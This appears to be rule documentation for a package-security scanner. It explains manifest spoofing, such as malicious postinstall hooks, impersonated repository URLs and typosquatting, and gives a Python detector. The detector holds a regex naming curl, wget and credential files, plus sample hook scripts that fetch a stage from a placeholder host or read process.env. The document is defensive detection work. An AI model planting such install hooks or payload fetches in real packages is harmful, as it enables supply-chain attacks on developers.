[T3.2] Manifest Spoofing

Detects hidden install scripts, mismatched metadata, and deceptive package manifests.

What It Detects

Manifest spoofing occurs when a skill’s package metadata is deliberately misleading or contains hidden executable hooks. This includes postinstall and preinstall scripts in package.json that run unexpected code, discrepancies between declared and actual skill capabilities, name-squatting on popular packages, and metadata fields (description, author, repository URL) that misrepresent the skill’s true purpose or origin.

Why It Matters

Manifest spoofing undermines the trust model of package ecosystems. Developers and automated tools rely on package metadata to make install decisions. When manifests are deliberately misleading — through hidden install hooks, false repository URLs, or typosquatted names — the entire chain of trust from author to consumer is broken. Manifest spoofing is a primary vector for supply chain attacks because it exploits trust before any code is executed.

Examples

  • A package.json includes a "postinstall": "node scripts/setup.js" entry where setup.js downloads and executes a remote payload, while the package description claims it is a simple string formatting utility.
  • A skill’s manifest declares "repository": "https://github.com/legitimate-org/tool" but the actual package source has no connection to that repository, impersonating a trusted project.
  • A package named lodassh (typosquatting lodash) includes a preinstall script that exfiltrates environment variables before the user notices the misspelling.

Severity & Impact

  • Severity: MEDIUM to HIGH
  • Score impact: -15 to -30 on the prompt_injection dimension
  • Escalation: Hidden install scripts that execute network requests or access sensitive files are rated HIGH. Metadata mismatches alone (such as a misleading description) are rated MEDIUM. Typosquatting combined with malicious install hooks is rated HIGH and often compounds with T2.2 (Process Spawning) and T1.1 (Direct Exfiltration) findings.
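The detection and escalation logic described above, as an added example that is not the scanner's own code: a small Python checker that parses a package.json, flags npm install hooks (preinstall, install, postinstall, prepare), reads the local script a hook runs to look for network or sensitive-data markers, applies a heuristic repository-vs-name check, and compares the package name against a list of popular names for typosquatting. The allowlist of build tools, the popular-name list, the marker regex, the sample manifests and the MEDIUM/HIGH mapping to -15/-30 are all constructed assumptions for this illustration.

```python
import json
import re
from difflib import SequenceMatcher

# npm lifecycle scripts that run automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed allowlist: hook commands starting with these are treated as
# documented native-build steps rather than hidden install scripts.
KNOWN_BUILD_TOOLS = ("node-gyp", "prebuild-install")

# Heuristic markers for network access or reads of sensitive data, applied to
# the hook command and to the local script it runs. Constructed for this example.
SUSPICIOUS = re.compile(
    r"(https?://|\bcurl\b|\bwget\b|\bfetch\(|process\.env|\.ssh\b|\.npmrc\b|\.aws\b)"
)

# Tiny constructed list of popular names used for typosquat comparison.
POPULAR_NAMES = ("lodash", "express", "react", "axios")

# Assumed mapping of severity to score impact, inside the -15 to -30 range above.
RANK = {None: 0, "MEDIUM": 1, "HIGH": 2}
SCORE_IMPACT = {None: 0, "MEDIUM": -15, "HIGH": -30}


def escalate(current, new):
    """Keep the more severe of two ratings."""
    return new if RANK[new] > RANK[current] else current


def hook_targets(command):
    """Local script paths a hook command executes, e.g. 'node scripts/setup.js'."""
    return re.findall(r"\b(?:node|sh|bash|python3?)\s+([\w./-]+)", command)


def typosquat_of(name):
    """The popular name this package name closely resembles, or None."""
    for popular in POPULAR_NAMES:
        if name != popular and SequenceMatcher(None, name, popular).ratio() >= 0.8:
            return popular
    return None


def repo_matches_package(manifest):
    """Heuristic: a declared repository path should mention the package name or author."""
    repo = manifest.get("repository", "")
    if isinstance(repo, dict):  # npm also allows {"type": "git", "url": "..."}
        repo = repo.get("url", "")
    if not repo:
        return True  # nothing declared, so nothing to contradict
    path = re.sub(r"\.git$", "", repo.lower().rstrip("/"))
    name = manifest.get("name", "").lower()
    author = str(manifest.get("author", "")).lower()
    return bool(name and name in path) or bool(author and author in path)


def check_manifest(manifest, files=None):
    """Return (severity, score_impact, findings) for one package.json document.

    `files` maps local script paths to their contents so hook targets can be
    read; a real scanner would read them from the unpacked package.
    """
    files = files or {}
    findings, severity = [], None
    scripts = manifest.get("scripts", {})

    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if command is None:
            continue
        words = command.split()
        if words and words[0] in KNOWN_BUILD_TOOLS:
            findings.append(f"install hook '{hook}' runs a known build tool: {command}")
            continue
        findings.append(f"install hook '{hook}': {command}")
        # Inspect both the command line and any local script it runs.
        blobs = [command] + [files.get(p, "") for p in hook_targets(command)]
        if any(SUSPICIOUS.search(b) for b in blobs):
            findings.append(f"hook '{hook}' reaches the network or sensitive data")
            severity = escalate(severity, "HIGH")
        else:
            severity = escalate(severity, "MEDIUM")  # undocumented hook, needs review

    if not repo_matches_package(manifest):
        findings.append("repository URL does not reference the package name or author")
        severity = escalate(severity, "MEDIUM")

    squatted = typosquat_of(manifest.get("name", ""))
    if squatted:
        findings.append(f"name resembles popular package '{squatted}'")
        has_hook = any(h in scripts for h in INSTALL_HOOKS)
        severity = escalate(severity, "HIGH" if has_hook else "MEDIUM")

    return severity, SCORE_IMPACT[severity], findings


# Constructed sample manifests mirroring the three examples above, plus one
# clean native module whose install hook is a legitimate build step.
SPOOFED_FORMATTER = json.loads('{"name": "string-fmt-lite", '
    '"description": "A simple string formatting utility", '
    '"scripts": {"postinstall": "node scripts/setup.js"}}')
SPOOFED_FORMATTER_FILES = {
    "scripts/setup.js": "// constructed stand-in\nfetch('https://example.invalid/stage2')"}
IMPERSONATOR = json.loads('{"name": "yaml-helper", "author": "unknown-dev", '
    '"repository": "https://github.com/legitimate-org/tool"}')
TYPOSQUAT = json.loads('{"name": "lodassh", '
    '"scripts": {"preinstall": "node scripts/collect.js"}}')
TYPOSQUAT_FILES = {"scripts/collect.js": "// constructed\nconst data = process.env;"}
NATIVE_MODULE = json.loads('{"name": "fast-hash-native", "author": "fast-hash", '
    '"repository": "https://github.com/fast-hash/fast-hash-native.git", '
    '"scripts": {"install": "node-gyp rebuild"}}')

if __name__ == "__main__":
    for label, manifest, files in (
        ("spoofed formatter", SPOOFED_FORMATTER, SPOOFED_FORMATTER_FILES),
        ("impersonator", IMPERSONATOR, None),
        ("typosquat", TYPOSQUAT, TYPOSQUAT_FILES),
        ("native module", NATIVE_MODULE, None),
    ):
        severity, impact, findings = check_manifest(manifest, files)
        print(f"{label}: {severity} ({impact})")
        for finding in findings:
            print("  -", finding)
```

The spoofed formatter and the typosquat both land at HIGH because the script their hook runs touches the network or process.env, the impersonator stays at MEDIUM on the metadata mismatch alone, and the native module produces only an informational finding because its hook is an allowlisted build tool. The repository check is a heuristic: a package whose name genuinely differs from its repository will trip it, which is why the finding asks for review rather than rejecting outright.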

Remediation

Declare all install hooks explicitly and ensure they perform only necessary build steps. Keep package descriptions accurate and aligned with actual functionality. Use a consistent, verifiable author identity and repository URL. Avoid obfuscated script references in manifest files. If install hooks are required for native module compilation or similar tasks, document their purpose clearly. Skill registries and consumers should verify that declared metadata matches observed behavior before trusting a package.